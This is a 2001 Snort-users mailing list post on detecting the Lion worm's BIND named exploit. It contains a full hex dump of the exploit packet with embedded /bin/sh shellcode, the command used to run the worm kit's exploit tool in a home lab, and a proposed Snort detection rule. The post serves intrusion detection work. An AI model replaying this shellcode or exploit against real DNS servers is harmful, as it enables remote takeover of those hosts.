1i0n (aka lion worm) RE: [Snort-users] New Worm Virus is in the wild

Andreas Östling andreaso at ...236...
Sat Mar 24 16:08:20 EST 2001


On Fri, 23 Mar 2001, Max Vision wrote:

> I created a signature to detect this attack February 8th, when the exploit
> was released (IDS482/named-exploit-tsig-infoleak) - I did this because LSD
> were the first people to release a *decent* working bind exploit.  So I
> wrote a signature for it... sure enough that is exactly what is used by
> this worm.  People using vision.conf since february 8th should have seen
> alerts for this attack (if the worm dropped by, whether it was successful
> or not).

Hmm.. so far I have seen the Lion worm executing the named exploit two
times in the wild. However, the latest vision.conf did not catch it (but
matching just "/bin/sh" on another Snort machine did).

Here I successfully exploit named on a RH 6.2 on my home network by
running "./bind 192.168.1.1 -v r" (using lib/scan/bind from crew.tgz)
, just like Lion does:

03/24-20:32:56.769354 192.168.1.3:1038 -> 192.168.1.1:53
UDP TTL:64 TOS:0x0 ID:8792 IpLen:20 DgmLen:537
Len: 517
AB CD 01 00 00 02 00 00 00 00 00 01 3F 90 90 90  ............?...
EB 3B 31 DB 5F 83 EF 7C 8D 77 10 89 77 04 8D 4F  .;1._..|.w..w..O
20 89 4F 08 B3 10 89 19 31 C9 B1 FF 89 0F 51 31   .O.....1.....Q1
C0 B0 66 B3 07 89 F9 CD 80 59 31 DB 39 D8 75 0A  ..f......Y1.9.u.
66 BB 06 65 66 39 5E 02 74 08 E2 E0 3F E8 C0 FF  f..ef9^.t...?...
FF FF 89 CB 31 C9 B1 03 31 C0 B0 3F 49 CD 80 41  ....1...1..?I..A
E2 F6 EB 14 31 C0 5B 8D 4B 14 89 19 89 43 18 88  ....1.[.K....C..
43 07 31 D2 B0 0B CD 80 E8 E7 FF FF FF 2F 62 69  C.1........../bi
6E 2F 73 68 90 90 90 90 90 90 90 90 01 FA 01 BF  n/sh............
01 81 01 40 01 81 01 40 01 00 01 00 01 FB 01 BF  ... at ...979...@........
01 FA 01 BF 01 00 01 00 01 00 01 00 01 8D 01 40  ...............@
01 FB 01 BF 01 52 01 40 01 00 01 00 01 FB 01 BF  .....R. at ...966...
01 00 01 00 01 00 01 00 01 62 01 08 01 63 01 08  .........b...c..
01 64 01 08 01 FB 01 BF 01 62 01 08 01 FC 01 BF  .d.......b......
01 65 01 08 01 00 01 00 01 00 01 00 01 00 01 00  .e..............
01 00 01 00 01 00 01 00 01 80 01 40 01 00 01 00  ........... at ...1322...
01 85 01 08 01 62 01 08 01 FB 01 BF 00 00 01 00  .....b..........
01 01 12 01 88 01 FF 01 01 01 00 01 08 01 12 01  ................
06 01 00 01 14 01 FF 01 D4 01 FF 01 55 01 05 01  ............U...
60 01 0D 01 06 01 00 01 88 01 FF 01 01 01 00 01  `...............
AC 01 05 01 B0 01 00 01 FC 01 FF 01 65 01 00 01  ............e...
A4 01 FF 01 90 01 FF 01 4A 01 08 01 0C 01 00 01  ........J.......
60 01 0D 01 00 01 00 01 64 01 11 01 A4 01 BD 01  `.......d.......
A4 01 FF 01 33 01 08 01 0C 01 00 01 00 01 00 01  ....3...........
00 01 00 01 74 01 FF 01 79 01 08 01 0C 01 00 01  ....t...y.......
A4 01 FF 01 40 01 10 01 00 01 00 01 01 01 00 01  .... at ...868...
00 01 00 01 00 01 0D 01 00 01 0D 01 00 01 0D 01  ................
80 01 0D 01 80 01 0D 01 80 01 0D 01 80 01 0D 01  ................
80 01 0D 01 02 01 00 01 00 01 00 01 00 01 00 01  ................
CC 01 11 01 B6 01 BD 01 00 01 00 01 A4 01 BD 10  ................
06 00 00 00 2D FA FF BF A0 A9 25 3B 00 FC FF BF  ....-.....%;....
01 A9 01 3B 00 00 01 00 01 00 00 FA FF           ...;.........

As you can see, IDS482 (|AB CD 09 80 00 00 00 01 00 00 00 00 00 00 01 00
01 20 20 20 20 02 61|) does not match this packet.

And another thing.
The Lion worm can be pretty easily detected by watching for a port 53 SYN
scan followed by an iquery followed by a named exploit, but I prefer also
to have a specific rule to catch the actual worm, because that most likely
means that the previous named exploit was successful.
For example something like:

alert tcp any any -> any 53 (msg: "Attempt to set $PATH on port 53/TCP - possibly a successful Lion worm"; content:"PATH="; depth: 5; flags: AP;)

Maybe something similar could be in arachNIDS?
There are of course several other things you could look for to catch the
worm. I don't think that the hosts "ifconfig -a" or "killall -HUP inetd"
should be looked up in the DNS very often for example :)

Regards,
Andreas Östling





More information about the Snort-users mailing list